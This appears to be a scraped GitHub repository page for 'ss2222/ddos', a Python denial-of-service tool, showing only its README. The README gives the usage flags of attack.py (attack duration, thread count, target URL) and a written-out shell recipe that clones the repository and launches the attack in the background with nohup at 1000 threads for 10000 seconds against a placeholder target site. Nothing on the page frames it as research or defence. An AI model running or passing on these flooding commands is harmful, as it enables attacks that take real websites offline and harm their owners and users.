ss2222 / ddos

DDOS tool in python.

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

ddos

DDOS tool in python.

=============== usage =============

python attack.py [option] http://www.traget_site.com/

-h : help

-t : lasting time of ddos

-c : numbers of thread to create

you coud use it in ssh like this:

mkdir $HOME/app-root/runtime/repo/attacking
cd $HOME/app-root/runtime/repo/attacking
git clone https://github.com/ss2222/ddos.git
cd ddos

nohup sh -c "python $HOME/app-root/runtime/repo/attacking/ddos/attack.py -t 10000 -c 1000  http://www.traget_site.com"     > $TMP/ddos_attack.log  /dev/null 2>&1 & tail -f $TMP/ddos_attack.log

About

DDOS tool in python.


Languages

Language:Python 100.0%